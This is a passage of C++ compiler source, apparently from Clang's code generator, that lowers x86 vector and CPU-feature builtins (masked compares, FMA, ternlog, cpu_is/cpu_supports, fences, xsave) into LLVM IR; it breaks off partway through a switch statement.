Mask = CGF.Builder.CreateBitCast(Mask, MaskTy);
Mask = CGF.Builder.CreateExtractElement(Mask, (uint64_t)0);
return CGF.Builder.CreateSelect(Mask, Op0, Op1);
}
static Value *EmitX86MaskedCompareResult(CodeGenFunction &CGF, Value *Cmp,
unsigned NumElts, Value *MaskIn) {
if (MaskIn) {
const auto *C = dyn_cast<Constant>(MaskIn);
if (!C || !C->isAllOnesValue())
Cmp = CGF.Builder.CreateAnd(Cmp, getMaskVecValue(CGF, MaskIn, NumElts));
}
if (NumElts < 8) {
int Indices[8];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i;
for (unsigned i = NumElts; i != 8; ++i)
Indices[i] = i % NumElts + NumElts;
Cmp = CGF.Builder.CreateShuffleVector(
Cmp, llvm::Constant::getNullValue(Cmp->getType()), Indices);
}
return CGF.Builder.CreateBitCast(Cmp,
IntegerType::get(CGF.getLLVMContext(),
std::max(NumElts, 8U)));
}
static Value *EmitX86MaskedCompare(CodeGenFunction &CGF, unsigned CC,
bool Signed, ArrayRef<Value *> Ops) {
assert((Ops.size() == 2 || Ops.size() == 4) &&
"Unexpected number of arguments");
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *Cmp;
if (CC == 3) {
Cmp = Constant::getNullValue(
llvm::FixedVectorType::get(CGF.Builder.getInt1Ty(), NumElts));
} else if (CC == 7) {
Cmp = Constant::getAllOnesValue(
llvm::FixedVectorType::get(CGF.Builder.getInt1Ty(), NumElts));
} else {
ICmpInst::Predicate Pred;
switch (CC) {
default: llvm_unreachable("Unknown condition code");
case 0: Pred = ICmpInst::ICMP_EQ; break;
case 1: Pred = Signed ? ICmpInst::ICMP_SLT : ICmpInst::ICMP_ULT; break;
case 2: Pred = Signed ? ICmpInst::ICMP_SLE : ICmpInst::ICMP_ULE; break;
case 4: Pred = ICmpInst::ICMP_NE; break;
case 5: Pred = Signed ? ICmpInst::ICMP_SGE : ICmpInst::ICMP_UGE; break;
case 6: Pred = Signed ? ICmpInst::ICMP_SGT : ICmpInst::ICMP_UGT; break;
}
Cmp = CGF.Builder.CreateICmp(Pred, Ops[0], Ops[1]);
}
Value *MaskIn = nullptr;
if (Ops.size() == 4)
MaskIn = Ops[3];
return EmitX86MaskedCompareResult(CGF, Cmp, NumElts, MaskIn);
}
static Value *EmitX86ConvertToMask(CodeGenFunction &CGF, Value *In) {
Value *Zero = Constant::getNullValue(In->getType());
return EmitX86MaskedCompare(CGF, 1, true, { In, Zero });
}
static Value *EmitX86ConvertIntToFp(CodeGenFunction &CGF, const CallExpr *E,
ArrayRef<Value *> Ops, bool IsSigned) {
unsigned Rnd = cast<llvm::ConstantInt>(Ops[3])->getZExtValue();
llvm::Type *Ty = Ops[1]->getType();
Value *Res;
if (Rnd != 4) {
Intrinsic::ID IID = IsSigned ? Intrinsic::x86_avx512_sitofp_round
: Intrinsic::x86_avx512_uitofp_round;
Function *F = CGF.CGM.getIntrinsic(IID, { Ty, Ops[0]->getType() });
Res = CGF.Builder.CreateCall(F, { Ops[0], Ops[3] });
} else {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Res = IsSigned ? CGF.Builder.CreateSIToFP(Ops[0], Ty)
: CGF.Builder.CreateUIToFP(Ops[0], Ty);
}
return EmitX86Select(CGF, Ops[2], Res, Ops[1]);
}
// Lowers X86 FMA intrinsics to IR.
static Value *EmitX86FMAExpr(CodeGenFunction &CGF, const CallExpr *E,
ArrayRef<Value *> Ops, unsigned BuiltinID,
bool IsAddSub) {
bool Subtract = false;
Intrinsic::ID IID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
default: break;
case clang::X86::BI__builtin_ia32_vfmsubph512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddph512_mask3:
IID = llvm::Intrinsic::x86_avx512fp16_vfmadd_ph_512;
break;
case clang::X86::BI__builtin_ia32_vfmsubaddph512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask3:
IID = llvm::Intrinsic::x86_avx512fp16_vfmaddsub_ph_512;
break;
case clang::X86::BI__builtin_ia32_vfmsubps512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddps512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmadd_ps_512; break;
case clang::X86::BI__builtin_ia32_vfmsubpd512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask:
case clang::X86::BI__builtin_ia32_vfmaddpd512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmadd_pd_512; break;
case clang::X86::BI__builtin_ia32_vfmsubaddps512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmaddsub_ps_512;
break;
case clang::X86::BI__builtin_ia32_vfmsubaddpd512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmaddsub_pd_512;
break;
}
Value *A = Ops[0];
Value *B = Ops[1];
Value *C = Ops[2];
if (Subtract)
C = CGF.Builder.CreateFNeg(C);
Value *Res;
// Only handle in case of _MM_FROUND_CUR_DIRECTION/4 (no rounding).
if (IID != Intrinsic::not_intrinsic &&
(cast<llvm::ConstantInt>(Ops.back())->getZExtValue() != (uint64_t)4 ||
IsAddSub)) {
Function *Intr = CGF.CGM.getIntrinsic(IID);
Res = CGF.Builder.CreateCall(Intr, {A, B, C, Ops.back() });
} else {
llvm::Type *Ty = A->getType();
Function *FMA;
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
FMA = CGF.CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, Ty);
Res = CGF.Builder.CreateConstrainedFPCall(FMA, {A, B, C});
} else {
FMA = CGF.CGM.getIntrinsic(Intrinsic::fma, Ty);
Res = CGF.Builder.CreateCall(FMA, {A, B, C});
}
}
// Handle any required masking.
Value *MaskFalseVal = nullptr;
switch (BuiltinID) {
case clang::X86::BI__builtin_ia32_vfmaddph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask:
MaskFalseVal = Ops[0];
break;
case clang::X86::BI__builtin_ia32_vfmaddph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddpd512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_maskz:
MaskFalseVal = Constant::getNullValue(Ops[0]->getType());
break;
case clang::X86::BI__builtin_ia32_vfmsubph512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddph512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubps512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddps512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubpd512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubaddph512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubaddps512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubaddpd512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask3:
MaskFalseVal = Ops[2];
break;
}
if (MaskFalseVal)
return EmitX86Select(CGF, Ops[3], Res, MaskFalseVal);
return Res;
}
static Value *EmitScalarFMAExpr(CodeGenFunction &CGF, const CallExpr *E,
MutableArrayRef<Value *> Ops, Value *Upper,
bool ZeroMask = false, unsigned PTIdx = 0,
bool NegAcc = false) {
unsigned Rnd = 4;
if (Ops.size() > 4)
Rnd = cast<llvm::ConstantInt>(Ops[4])->getZExtValue();
if (NegAcc)
Ops[2] = CGF.Builder.CreateFNeg(Ops[2]);
Ops[0] = CGF.Builder.CreateExtractElement(Ops[0], (uint64_t)0);
Ops[1] = CGF.Builder.CreateExtractElement(Ops[1], (uint64_t)0);
Ops[2] = CGF.Builder.CreateExtractElement(Ops[2], (uint64_t)0);
Value *Res;
if (Rnd != 4) {
Intrinsic::ID IID;
switch (Ops[0]->getType()->getPrimitiveSizeInBits()) {
case 16:
IID = Intrinsic::x86_avx512fp16_vfmadd_f16;
break;
case 32:
IID = Intrinsic::x86_avx512_vfmadd_f32;
break;
case 64:
IID = Intrinsic::x86_avx512_vfmadd_f64;
break;
default:
llvm_unreachable("Unexpected size");
}
Res = CGF.Builder.CreateCall(CGF.CGM.getIntrinsic(IID),
{Ops[0], Ops[1], Ops[2], Ops[4]});
} else if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *FMA = CGF.CGM.getIntrinsic(
Intrinsic::experimental_constrained_fma, Ops[0]->getType());
Res = CGF.Builder.CreateConstrainedFPCall(FMA, Ops.slice(0, 3));
} else {
Function *FMA = CGF.CGM.getIntrinsic(Intrinsic::fma, Ops[0]->getType());
Res = CGF.Builder.CreateCall(FMA, Ops.slice(0, 3));
}
// If we have more than 3 arguments, we need to do masking.
if (Ops.size() > 3) {
Value *PassThru = ZeroMask ? Constant::getNullValue(Res->getType())
: Ops[PTIdx];
// If we negated the accumulator and the its the PassThru value we need to
// bypass the negate. Conveniently Upper should be the same thing in this
// case.
if (NegAcc && PTIdx == 2)
PassThru = CGF.Builder.CreateExtractElement(Upper, (uint64_t)0);
Res = EmitX86ScalarSelect(CGF, Ops[3], Res, PassThru);
}
return CGF.Builder.CreateInsertElement(Upper, Res, (uint64_t)0);
}
static Value *EmitX86Muldq(CodeGenFunction &CGF, bool IsSigned,
ArrayRef<Value *> Ops) {
llvm::Type *Ty = Ops[0]->getType();
// Arguments have a vXi32 type so cast to vXi64.
Ty = llvm::FixedVectorType::get(CGF.Int64Ty,
Ty->getPrimitiveSizeInBits() / 64);
Value *LHS = CGF.Builder.CreateBitCast(Ops[0], Ty);
Value *RHS = CGF.Builder.CreateBitCast(Ops[1], Ty);
if (IsSigned) {
// Shift left then arithmetic shift right.
Constant *ShiftAmt = ConstantInt::get(Ty, 32);
LHS = CGF.Builder.CreateShl(LHS, ShiftAmt);
LHS = CGF.Builder.CreateAShr(LHS, ShiftAmt);
RHS = CGF.Builder.CreateShl(RHS, ShiftAmt);
RHS = CGF.Builder.CreateAShr(RHS, ShiftAmt);
} else {
// Clear the upper bits.
Constant *Mask = ConstantInt::get(Ty, 0xffffffff);
LHS = CGF.Builder.CreateAnd(LHS, Mask);
RHS = CGF.Builder.CreateAnd(RHS, Mask);
}
return CGF.Builder.CreateMul(LHS, RHS);
}
// Emit a masked pternlog intrinsic. This only exists because the header has to
// use a macro and we aren't able to pass the input argument to a pternlog
// builtin and a select builtin without evaluating it twice.
static Value *EmitX86Ternlog(CodeGenFunction &CGF, bool ZeroMask,
ArrayRef<Value *> Ops) {
llvm::Type *Ty = Ops[0]->getType();
unsigned VecWidth = Ty->getPrimitiveSizeInBits();
unsigned EltWidth = Ty->getScalarSizeInBits();
Intrinsic::ID IID;
if (VecWidth == 128 && EltWidth == 32)
IID = Intrinsic::x86_avx512_pternlog_d_128;
else if (VecWidth == 256 && EltWidth == 32)
IID = Intrinsic::x86_avx512_pternlog_d_256;
else if (VecWidth == 512 && EltWidth == 32)
IID = Intrinsic::x86_avx512_pternlog_d_512;
else if (VecWidth == 128 && EltWidth == 64)
IID = Intrinsic::x86_avx512_pternlog_q_128;
else if (VecWidth == 256 && EltWidth == 64)
IID = Intrinsic::x86_avx512_pternlog_q_256;
else if (VecWidth == 512 && EltWidth == 64)
IID = Intrinsic::x86_avx512_pternlog_q_512;
else
llvm_unreachable("Unexpected intrinsic");
Value *Ternlog = CGF.Builder.CreateCall(CGF.CGM.getIntrinsic(IID),
Ops.drop_back());
Value *PassThru = ZeroMask ? ConstantAggregateZero::get(Ty) : Ops[0];
return EmitX86Select(CGF, Ops[4], Ternlog, PassThru);
}
static Value *EmitX86SExtMask(CodeGenFunction &CGF, Value *Op,
llvm::Type *DstTy) {
unsigned NumberOfElements =
cast<llvm::FixedVectorType>(DstTy)->getNumElements();
Value *Mask = getMaskVecValue(CGF, Op, NumberOfElements);
return CGF.Builder.CreateSExt(Mask, DstTy, "vpmovm2");
}
// Emit binary intrinsic with the same type used in result/args.
static Value *EmitX86BinaryIntrinsic(CodeGenFunction &CGF,
ArrayRef<Value *> Ops, Intrinsic::ID IID) {
llvm::Function *F = CGF.CGM.getIntrinsic(IID, Ops[0]->getType());
return CGF.Builder.CreateCall(F, {Ops[0], Ops[1]});
}
Value *CodeGenFunction::EmitX86CpuIs(const CallExpr *E) {
const Expr *CPUExpr = E->getArg(0)->IgnoreParenCasts();
StringRef CPUStr = cast<clang::StringLiteral>(CPUExpr)->getString();
return EmitX86CpuIs(CPUStr);
}
// Convert F16 halfs to floats.
static Value *EmitX86CvtF16ToFloatExpr(CodeGenFunction &CGF,
ArrayRef<Value *> Ops,
llvm::Type *DstTy) {
assert((Ops.size() == 1 || Ops.size() == 3 || Ops.size() == 4) &&
"Unknown cvtph2ps intrinsic");
// If the SAE intrinsic doesn't use default rounding then we can't upgrade.
if (Ops.size() == 4 && cast<llvm::ConstantInt>(Ops[3])->getZExtValue() != 4) {
Function *F =
CGF.CGM.getIntrinsic(Intrinsic::x86_avx512_mask_vcvtph2ps_512);
return CGF.Builder.CreateCall(F, {Ops[0], Ops[1], Ops[2], Ops[3]});
}
unsigned NumDstElts = cast<llvm::FixedVectorType>(DstTy)->getNumElements();
Value *Src = Ops[0];
// Extract the subvector.
if (NumDstElts !=
cast<llvm::FixedVectorType>(Src->getType())->getNumElements()) {
assert(NumDstElts == 4 && "Unexpected vector size");
Src = CGF.Builder.CreateShuffleVector(Src, ArrayRef<int>{0, 1, 2, 3});
}
// Bitcast from vXi16 to vXf16.
auto *HalfTy = llvm::FixedVectorType::get(
llvm::Type::getHalfTy(CGF.getLLVMContext()), NumDstElts);
Src = CGF.Builder.CreateBitCast(Src, HalfTy);
// Perform the fp-extension.
Value *Res = CGF.Builder.CreateFPExt(Src, DstTy, "cvtph2ps");
if (Ops.size() >= 3)
Res = EmitX86Select(CGF, Ops[2], Res, Ops[1]);
return Res;
}
// Convert a BF16 to a float.
static Value *EmitX86CvtBF16ToFloatExpr(CodeGenFunction &CGF,
const CallExpr *E,
ArrayRef<Value *> Ops) {
llvm::Type *Int32Ty = CGF.Builder.getInt32Ty();
Value *ZeroExt = CGF.Builder.CreateZExt(Ops[0], Int32Ty);
Value *Shl = CGF.Builder.CreateShl(ZeroExt, 16);
llvm::Type *ResultType = CGF.ConvertType(E->getType());
Value *BitCast = CGF.Builder.CreateBitCast(Shl, ResultType);
return BitCast;
}
Value *CodeGenFunction::EmitX86CpuIs(StringRef CPUStr) {
llvm::Type *Int32Ty = Builder.getInt32Ty();
// Matching the struct layout from the compiler-rt/libgcc structure that is
// filled in:
// unsigned int __cpu_vendor;
// unsigned int __cpu_type;
// unsigned int __cpu_subtype;
// unsigned int __cpu_features[1];
llvm::Type *STy = llvm::StructType::get(Int32Ty, Int32Ty, Int32Ty,
llvm::ArrayType::get(Int32Ty, 1));
// Grab the global __cpu_model.
llvm::Constant *CpuModel = CGM.CreateRuntimeVariable(STy, "__cpu_model");
cast<llvm::GlobalValue>(CpuModel)->setDSOLocal(true);
// Calculate the index needed to access the correct field based on the
// range. Also adjust the expected value.
unsigned Index;
unsigned Value;
std::tie(Index, Value) = StringSwitch<std::pair<unsigned, unsigned>>(CPUStr)
#define X86_VENDOR(ENUM, STRING) \
.Case(STRING, {0u, static_cast<unsigned>(llvm::X86::ENUM)})
#define X86_CPU_TYPE_ALIAS(ENUM, ALIAS) \
.Case(ALIAS, {1u, static_cast<unsigned>(llvm::X86::ENUM)})
#define X86_CPU_TYPE(ENUM, STR) \
.Case(STR, {1u, static_cast<unsigned>(llvm::X86::ENUM)})
#define X86_CPU_SUBTYPE(ENUM, STR) \
.Case(STR, {2u, static_cast<unsigned>(llvm::X86::ENUM)})
#include "llvm/Support/X86TargetParser.def"
.Default({0, 0});
assert(Value != 0 && "Invalid CPUStr passed to CpuIs");
// Grab the appropriate field from __cpu_model.
llvm::Value *Idxs[] = {ConstantInt::get(Int32Ty, 0),
ConstantInt::get(Int32Ty, Index)};
llvm::Value *CpuValue = Builder.CreateGEP(STy, CpuModel, Idxs);
CpuValue = Builder.CreateAlignedLoad(Int32Ty, CpuValue,
CharUnits::fromQuantity(4));
// Check the value of the field against the requested value.
return Builder.CreateICmpEQ(CpuValue,
llvm::ConstantInt::get(Int32Ty, Value));
}
Value *CodeGenFunction::EmitX86CpuSupports(const CallExpr *E) {
const Expr *FeatureExpr = E->getArg(0)->IgnoreParenCasts();
StringRef FeatureStr = cast<StringLiteral>(FeatureExpr)->getString();
return EmitX86CpuSupports(FeatureStr);
}
Value *CodeGenFunction::EmitX86CpuSupports(ArrayRef<StringRef> FeatureStrs) {
return EmitX86CpuSupports(llvm::X86::getCpuSupportsMask(FeatureStrs));
}
llvm::Value *CodeGenFunction::EmitX86CpuSupports(uint64_t FeaturesMask) {
uint32_t Features1 = Lo_32(FeaturesMask);
uint32_t Features2 = Hi_32(FeaturesMask);
Value *Result = Builder.getTrue();
if (Features1 != 0) {
// Matching the struct layout from the compiler-rt/libgcc structure that is
// filled in:
// unsigned int __cpu_vendor;
// unsigned int __cpu_type;
// unsigned int __cpu_subtype;
// unsigned int __cpu_features[1];
llvm::Type *STy = llvm::StructType::get(Int32Ty, Int32Ty, Int32Ty,
llvm::ArrayType::get(Int32Ty, 1));
// Grab the global __cpu_model.
llvm::Constant *CpuModel = CGM.CreateRuntimeVariable(STy, "__cpu_model");
cast<llvm::GlobalValue>(CpuModel)->setDSOLocal(true);
// Grab the first (0th) element from the field __cpu_features off of the
// global in the struct STy.
Value *Idxs[] = {Builder.getInt32(0), Builder.getInt32(3),
Builder.getInt32(0)};
Value *CpuFeatures = Builder.CreateGEP(STy, CpuModel, Idxs);
Value *Features = Builder.CreateAlignedLoad(Int32Ty, CpuFeatures,
CharUnits::fromQuantity(4));
// Check the value of the bit corresponding to the feature requested.
Value *Mask = Builder.getInt32(Features1);
Value *Bitset = Builder.CreateAnd(Features, Mask);
Value *Cmp = Builder.CreateICmpEQ(Bitset, Mask);
Result = Builder.CreateAnd(Result, Cmp);
}
if (Features2 != 0) {
llvm::Constant *CpuFeatures2 = CGM.CreateRuntimeVariable(Int32Ty,
"__cpu_features2");
cast<llvm::GlobalValue>(CpuFeatures2)->setDSOLocal(true);
Value *Features = Builder.CreateAlignedLoad(Int32Ty, CpuFeatures2,
CharUnits::fromQuantity(4));
// Check the value of the bit corresponding to the feature requested.
Value *Mask = Builder.getInt32(Features2);
Value *Bitset = Builder.CreateAnd(Features, Mask);
Value *Cmp = Builder.CreateICmpEQ(Bitset, Mask);
Result = Builder.CreateAnd(Result, Cmp);
}
return Result;
}
Value *CodeGenFunction::EmitX86CpuInit() {
llvm::FunctionType *FTy = llvm::FunctionType::get(VoidTy,
/*Variadic*/ false);
llvm::FunctionCallee Func =
CGM.CreateRuntimeFunction(FTy, "__cpu_indicator_init");
cast<llvm::GlobalValue>(Func.getCallee())->setDSOLocal(true);
cast<llvm::GlobalValue>(Func.getCallee())
->setDLLStorageClass(llvm::GlobalValue::DefaultStorageClass);
return Builder.CreateCall(Func);
}
Value *CodeGenFunction::EmitX86BuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
if (BuiltinID == X86::BI__builtin_cpu_is)
return EmitX86CpuIs(E);
if (BuiltinID == X86::BI__builtin_cpu_supports)
return EmitX86CpuSupports(E);
if (BuiltinID == X86::BI__builtin_cpu_init)
return EmitX86CpuInit();
// Handle MSVC intrinsics before argument evaluation to prevent double
// evaluation.
if (Optional<MSVCIntrin> MsvcIntId = translateX86ToMsvcIntrin(BuiltinID))
return EmitMSVCBuiltinExpr(*MsvcIntId, E);
SmallVector<Value*, 4> Ops;
bool IsMaskFCmp = false;
bool IsConjFMA = false;
// Find out if any arguments are required to be integer constant expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++) {
// If this is a normal argument, just emit it as a scalar.
if ((ICEArguments & (1 << i)) == 0) {
Ops.push_back(EmitScalarExpr(E->getArg(i)));
continue;
}
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Ops.push_back(llvm::ConstantInt::get(
getLLVMContext(), *E->getArg(i)->getIntegerConstantExpr(getContext())));
}
// These exist so that the builtin that takes an immediate can be bounds
// checked by clang to avoid passing bad immediates to the backend. Since
// AVX has a larger immediate than SSE we would need separate builtins to
// do the different bounds checking. Rather than create a clang specific
// SSE only builtin, this implements eight separate builtins to match gcc
// implementation.
auto getCmpIntrinsicCall = [this, &Ops](Intrinsic::ID ID, unsigned Imm) {
Ops.push_back(llvm::ConstantInt::get(Int8Ty, Imm));
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops);
};
// For the vector forms of FP comparisons, translate the builtins directly to
// IR.
// TODO: The builtins could be removed if the SSE header files used vector
// extension comparisons directly (vector ordered/unordered may need
// additional support via __builtin_isnan()).
auto getVectorFCmpIR = [this, &Ops, E](CmpInst::Predicate Pred,
bool IsSignaling) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *Cmp;
if (IsSignaling)
Cmp = Builder.CreateFCmpS(Pred, Ops[0], Ops[1]);
else
Cmp = Builder.CreateFCmp(Pred, Ops[0], Ops[1]);
llvm::VectorType *FPVecTy = cast<llvm::VectorType>(Ops[0]->getType());
llvm::VectorType *IntVecTy = llvm::VectorType::getInteger(FPVecTy);
Value *Sext = Builder.CreateSExt(Cmp, IntVecTy);
return Builder.CreateBitCast(Sext, FPVecTy);
};
switch (BuiltinID) {
default: return nullptr;
case X86::BI_mm_prefetch: {
Value *Address = Ops[0];
ConstantInt *C = cast<ConstantInt>(Ops[1]);
Value *RW = ConstantInt::get(Int32Ty, (C->getZExtValue() >> 2) & 0x1);
Value *Locality = ConstantInt::get(Int32Ty, C->getZExtValue() & 0x3);
Value *Data = ConstantInt::get(Int32Ty, 1);
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return Builder.CreateCall(F, {Address, RW, Locality, Data});
}
case X86::BI_mm_clflush: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_clflush),
Ops[0]);
}
case X86::BI_mm_lfence: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_lfence));
}
case X86::BI_mm_mfence: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_mfence));
}
case X86::BI_mm_sfence: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse_sfence));
}
case X86::BI_mm_pause: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_pause));
}
case X86::BI__rdtsc: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_rdtsc));
}
case X86::BI__builtin_ia32_rdtscp: {
Value *Call = Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_rdtscp));
Builder.CreateDefaultAlignedStore(Builder.CreateExtractValue(Call, 1),
Ops[0]);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_lzcnt_u16:
case X86::BI__builtin_ia32_lzcnt_u32:
case X86::BI__builtin_ia32_lzcnt_u64: {
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0], Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_tzcnt_u16:
case X86::BI__builtin_ia32_tzcnt_u32:
case X86::BI__builtin_ia32_tzcnt_u64: {
Function *F = CGM.getIntrinsic(Intrinsic::cttz, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0], Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_undef128:
case X86::BI__builtin_ia32_undef256:
case X86::BI__builtin_ia32_undef512:
// The x86 definition of "undef" is not the same as the LLVM definition
// (PR32176). We leave optimizing away an unnecessary zero constant to the
// IR optimizer and backend.
// TODO: If we had a "freeze" IR instruction to generate a fixed undef
// value, we should use that here instead of a zero.
return llvm::Constant::getNullValue(ConvertType(E->getType()));
case X86::BI__builtin_ia32_vec_init_v8qi:
case X86::BI__builtin_ia32_vec_init_v4hi:
case X86::BI__builtin_ia32_vec_init_v2si:
return Builder.CreateBitCast(BuildVector(Ops),
llvm::Type::getX86_MMXTy(getLLVMContext()));
case X86::BI__builtin_ia32_vec_ext_v2si:
case X86::BI__builtin_ia32_vec_ext_v16qi:
case X86::BI__builtin_ia32_vec_ext_v8hi:
case X86::BI__builtin_ia32_vec_ext_v4si:
case X86::BI__builtin_ia32_vec_ext_v4sf:
case X86::BI__builtin_ia32_vec_ext_v2di:
case X86::BI__builtin_ia32_vec_ext_v32qi:
case X86::BI__builtin_ia32_vec_ext_v16hi:
case X86::BI__builtin_ia32_vec_ext_v8si:
case X86::BI__builtin_ia32_vec_ext_v4di: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
uint64_t Index = cast<ConstantInt>(Ops[1])->getZExtValue();
Index &= NumElts - 1;
// These builtins exist so we can ensure the index is an ICE and in range.
// Otherwise we could just do this in the header file.
return Builder.CreateExtractElement(Ops[0], Index);
}
case X86::BI__builtin_ia32_vec_set_v16qi:
case X86::BI__builtin_ia32_vec_set_v8hi:
case X86::BI__builtin_ia32_vec_set_v4si:
case X86::BI__builtin_ia32_vec_set_v2di:
case X86::BI__builtin_ia32_vec_set_v32qi:
case X86::BI__builtin_ia32_vec_set_v16hi:
case X86::BI__builtin_ia32_vec_set_v8si:
case X86::BI__builtin_ia32_vec_set_v4di: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned Index = cast<ConstantInt>(Ops[2])->getZExtValue();
Index &= NumElts - 1;
// These builtins exist so we can ensure the index is an ICE and in range.
// Otherwise we could just do this in the header file.
return Builder.CreateInsertElement(Ops[0], Ops[1], Index);
}
case X86::BI_mm_setcsr:
case X86::BI__builtin_ia32_ldmxcsr: {
Address Tmp = CreateMemTemp(E->getArg(0)->getType());
Builder.CreateStore(Ops[0], Tmp);
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse_ldmxcsr),
Builder.CreateBitCast(Tmp.getPointer(), Int8PtrTy));
}
case X86::BI_mm_getcsr:
case X86::BI__builtin_ia32_stmxcsr: {
Address Tmp = CreateMemTemp(E->getType());
Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse_stmxcsr),
Builder.CreateBitCast(Tmp.getPointer(), Int8PtrTy));
return Builder.CreateLoad(Tmp, "stmxcsr");
}
case X86::BI__builtin_ia32_xsave:
case X86::BI__builtin_ia32_xsave64:
case X86::BI__builtin_ia32_xrstor:
case X86::BI__builtin_ia32_xrstor64:
case X86::BI__builtin_ia32_xsaveopt:
case X86::BI__builtin_ia32_xsaveopt64:
case X86::BI__builtin_ia32_xrstors:
case X86::BI__builtin_ia32_xrstors64:
case X86::BI__builtin_ia32_xsavec:
case X86::BI__builtin_ia32_xsavec64:
case X86::BI__builtin_ia32_xsaves:
case X86::BI__builtin_ia32_xsaves64:
case X86::BI__builtin_ia32_xsetbv:
case X86::BI_xsetbv: {
Intrinsic::ID ID;
#define INTRINSIC_X86_XSAVE_ID(NAME) \
case X86::BI__builtin_ia32_##NAME: \
ID = Intrinsic::x86_##NAME; \
break
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
INTRINSIC_X86_XSAVE_ID(xsave);
INTRINSIC_X86_XSAVE_ID(xsave64);
INTRINSIC_X86_XSAVE_ID(xrstor);
INTRINSIC_X86_XSAVE_ID(xrstor64);
INTRINSIC_X86_XSAVE_ID(xsaveopt);
INTRINSIC_X86_XSAVE_ID(xsaveopt64);
INTRINSIC_X86_XSAVE_ID(xrstors);
INTRINSIC_X86_XSAVE_ID(xrstors64);
INTRINSIC_X86_XSAVE_ID(xsavec);
INTRINSIC_X86_XSAVE_ID(xsavec64);
INTRINSIC_X86_XSAVE_ID(xsaves);
INTRINSIC_X86_XSAVE_ID(xsaves64);
